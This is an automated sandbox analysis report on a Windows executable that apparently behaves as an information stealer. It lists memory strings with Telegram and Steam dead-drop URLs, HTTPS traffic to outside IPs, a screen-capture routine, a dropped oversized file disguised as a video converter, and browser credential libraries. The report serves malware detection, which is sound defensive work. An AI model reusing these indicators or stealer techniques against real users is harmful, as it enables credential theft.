                          Source: 7ZthFNAqYp.exe, 00000002.00000003.2781191713.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
                          Source: DHCBGD.2.drString found in binary or memory: https://support.mozilla.org
                          Source: DHCBGD.2.drString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                          Source: DHCBGD.2.drString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.ZAnPVwXvBbYt
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.2960467392.000000000109C000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.000000000109C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.2960467392.000000000109C000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.000000000109C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/JDc
                          Source: 7ZthFNAqYp.exe, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.00000000010C8000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001088000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2781261554.00000000010C9000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.00000000010B7000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001058000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2679355376.00000000010D4000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2679355376.00000000010C4000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.00000000010B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/fun88rockskek
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.2679355376.00000000010D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/fun88rockskekHn
                          Source: 7ZthFNAqYp.exe, 00000000.00000002.2332683863.00000000027E0000.00000040.00001000.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000000.00000002.2331724187.0000000000833000.00000040.00000001.01000000.00000003.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://t.me/fun88rockskekcarrghttps://steamcommunity.com/profiles/76561199786602107g0b4csql.dllsqlp
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001088000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001058000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/fun88rockskeki
                          Source: 7ZthFNAqYp.exe, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://t.me/lpnjoke
                          Source: 7ZthFNAqYp.exe, 00000000.00000002.2332683863.00000000027E0000.00000040.00001000.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000000.00000002.2331724187.0000000000833000.00000040.00000001.01000000.00000003.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://t.me/lpnjokeg0b4cMozilla/5.0
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.2679355376.00000000010D4000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.00000000010B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://web.telegram.org
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001115000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001186000.00000004.00000020.00020000.00000000.sdmp, CFCFHJ.2.drString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.3215940608.0000000001139000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3412588764.000000003E4BB000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3404341759.00000000266F2000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.3262289732.0000000001139000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3402404938.000000002078F000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.drString found in binary or memory: https://www.digicert.com/CPS0
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.3103179826.00000000011BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.2799058040.00000000010C5000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2781261554.00000000010C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.3103179826.00000000011BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.2781261554.00000000010C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.2799058040.00000000010C5000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2781261554.00000000010C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.cn/recaptcha/
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.2799058040.00000000010C5000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2781261554.00000000010C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
                          Source: DHCBGD.2.drString found in binary or memory: https://www.mozilla.org
                          Source: DHCBGD.2.drString found in binary or memory: https://www.mozilla.org#
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3399181312.0000000019C1D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/
                          Source: DHCBGD.2.drString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/ost.exe
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3399181312.0000000019C1D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/
                          Source: DHCBGD.2.drString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/xe
                          Source: DHCBGD.2.drString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001115000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001186000.00000004.00000020.00020000.00000000.sdmp, CFCFHJ.2.drString found in binary or memory: https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.2799058040.00000000010C5000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2781261554.00000000010C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.2799058040.00000000010C5000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2781261554.00000000010C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49997 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50013 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49940
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50007 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50010
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50012
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50011
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50014
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50013
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50003 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49990 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50010 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50008 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50014 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49988 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50000 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50004 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49991 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49995 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50009 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50011 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49989 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50001 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49940 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50005 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49992 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49997
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50007
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50006
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50012 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49995
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50009
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49994
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50008
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49994 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49993
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49992
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49991
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49990
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50001
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50000
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50003
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50002
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50005
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50004
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50002 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50006 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49993 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49989
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49988
                          Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.6:49940 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 23.192.247.89:443 -> 192.168.2.6:49988 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 95.217.220.103:443 -> 192.168.2.6:49989 version: TLS 1.2
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_00931F2A CreateStreamOnHGlobal,GetDesktopWindow,GetWindowRect,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GetHGlobalFromStream,GlobalLock,GlobalSize,SelectObject,DeleteObject,DeleteObject,ReleaseDC,CloseWindow,2_2_00931F2A

                          System Summary

                          barindex
                          Drops large PE files
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeFile dump: AttoConvertVideo.exe.0.dr 979379375Jump to dropped file
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_0092145B GetCurrentProcess,NtQueryInformationProcess,2_2_0092145B
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_0093C6032_2_0093C603
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_0093B8A32_2_0093B8A3
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_0094DAC32_2_0094DAC3
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_0094D3532_2_0094D353
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_009396982_2_00939698
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_0094CEBE2_2_0094CEBE
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_0094DEAB2_2_0094DEAB
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_0094D6F12_2_0094D6F1
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_6CA4ECC02_2_6CA4ECC0
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_6CAAECD02_2_6CAAECD0
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_6CB2AC302_2_6CB2AC30
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_6CB16C002_2_6CB16C00
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_6CA5AC602_2_6CA5AC60
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_6CA54DB02_2_6CA54DB0
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_6CAE6D902_2_6CAE6D90
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_6CBDCDC02_2_6CBDCDC0
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_6CBD8D202_2_6CBD8D20
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_6CB1ED702_2_6CB1ED70
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_6CB7AD502_2_6CB7AD50
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_6CAD6E902_2_6CAD6E90
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_6CA5AEC02_2_6CA5AEC0
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_6CAF0EC02_2_6CAF0EC0
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_6CB30E202_2_6CB30E20
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_6CAEEE702_2_6CAEEE70
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_6CB98FB02_2_6CB98FB0
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_6CA5EFB02_2_6CA5EFB0
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_6CB2EFF02_2_6CB2EFF0
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_6CA50FE02_2_6CA50FE0
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_6CB90F202_2_6CB90F20
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_6CA56F102_2_6CA56F10
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_6CB12F702_2_6CB12F70
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_6CABEF402_2_6CABEF40
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_6CB568E02_2_6CB568E0
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_6CAA08202_2_6CAA0820
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_6CADA8202_2_6CADA820
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_6CB248402_2_6CB24840
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_6CB109B02_2_6CB109B0
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_6CAE09A02_2_6CAE09A0
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_6CB0A9A02_2_6CB0A9A0
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_6CB6C9E02_2_6CB6C9E0
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_6CA849F02_2_6CA849F0
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_6CAA69002_2_6CAA6900
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_6CA889602_2_6CA88960
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_6CACEA802_2_6CACEA80
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_6CB08A302_2_6CB08A30
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_6CAFEA002_2_6CAFEA00
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_6CACCA702_2_6CACCA70
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_6CAF0BA02_2_6CAF0BA0
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_6CB56BE02_2_6CB56BE0
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_6CB7A4802_2_6CB7A480
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_6CA964D02_2_6CA964D0
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_6CAEA4D02_2_6CAEA4D0
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_6CAB44202_2_6CAB4420
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_6CADA4302_2_6CADA430
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_6CA684602_2_6CA68460
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_6CA445B02_2_6CA445B0
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_6CB1A5E02_2_6CB1A5E0
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_6CADE5F02_2_6CADE5F0
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_6CAB25602_2_6CAB2560
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_6CAF05702_2_6CAF0570
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_6CB985502_2_6CB98550
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_6CAA85402_2_6CAA8540
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_6CB545402_2_6CB54540
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_6CAAE6E02_2_6CAAE6E0
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_6CAEE6E02_2_6CAEE6E0
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_6CA746D02_2_6CA746D0
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_6CAAC6502_2_6CAAC650
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_6CA7A7D02_2_6CA7A7D0
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_6CAD07002_2_6CAD0700
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_6CB2C0B02_2_6CB2C0B0
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_6CA600B02_2_6CA600B0
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_6CA480902_2_6CA48090
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_6CB180102_2_6CB18010
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_6CB1C0002_2_6CB1C000
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_6CA9E0702_2_6CA9E070
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_6CA501E02_2_6CA501E0
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_6CB341302_2_6CB34130
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_6CAC61302_2_6CAC6130
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_6CAB81402_2_6CAB8140
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_6CB1E2B02_2_6CB1E2B0
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_6CB222A02_2_6CB222A0
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_6CBD62C02_2_6CBD62C0
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_6CB282202_2_6CB28220
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_6CB1A2102_2_6CB1A210
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_6CAD82602_2_6CAD8260
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_6CAE82502_2_6CAE8250
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_6CA823A02_2_6CA823A0
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_6CAAE3B02_2_6CAAE3B0
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_6CAA43E02_2_6CAA43E0
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_6CAC23202_2_6CAC2320
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_6CB923702_2_6CB92370
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_6CA523702_2_6CA52370
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_6CB6C3602_2_6CB6C360
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_6CAE63702_2_6CAE6370
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_6CA583402_2_6CA58340
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_6CB11CE02_2_6CB11CE0
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_6CB8DCD02_2_6CB8DCD0
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_6CA61C302_2_6CA61C30
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_6CA53C402_2_6CA53C40
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_6CB79C402_2_6CB79C40
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_6CA43D802_2_6CA43D80
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_6CB99D902_2_6CB99D90
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_6CB21DC02_2_6CB21DC0
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_6CAB3D002_2_6CAB3D00
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_6CA73EC02_2_6CA73EC0
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_6CB5DE102_2_6CB5DE10
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_6CBABE702_2_6CBABE70
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_6CBD5E602_2_6CBD5E60
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_6CA71F902_2_6CA71F90
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_6CAFBFF02_2_6CAFBFF0
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_6CB6DFC02_2_6CB6DFC0
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_6CBD3FC02_2_6CBD3FC0
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: 2_2_6CA85F202_2_6CA85F20
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: String function: 6CB89F30 appears 31 times
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: String function: 009247E8 appears 38 times
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: String function: 6CA73620 appears 73 times
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: String function: 009304BC appears 37 times
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: String function: 6CA79B10 appears 73 times
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exeCode function: String function: 009305DE appears 71 times
                          Source: 7ZthFNAqYp.exeStatic PE information: Resource name: None type: DOS executable (COM)
                          Source: AttoConvertVideo.exe.0.drStatic PE information: Resource name: None type: DOS executable (COM)
                          Source: 7ZthFNAqYp.exeBinary or memory string: OriginalFilename vs 7ZthFNAqYp.exe
                          Source: 7ZthFNAqYp.exe, 00000000.00000000.2134642418.000000000082F000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameATTODiskBenchmark.exeH vs 7ZthFNAqYp.exe
                          Source: 7ZthFNAqYp.exe, 00000000.00000002.2332999034.0000000002E74000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameATTODiskBenchmark.exeH vs 7ZthFNAqYp.exe
                          Source: 7ZthFNAqYp.exe, 00000000.00000002.2331724187.0000000000833000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameATTODiskBenchmark.exeH vs 7ZthFNAqYp.exe
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3406548089.000000002C66D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsvcp140.dll^ vs 7ZthFNAqYp.exe
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3412588764.000000003E4BB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamenss3.dll0 vs 7ZthFNAqYp.exe
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesoftokn3.dll0 vs 7ZthFNAqYp.exe
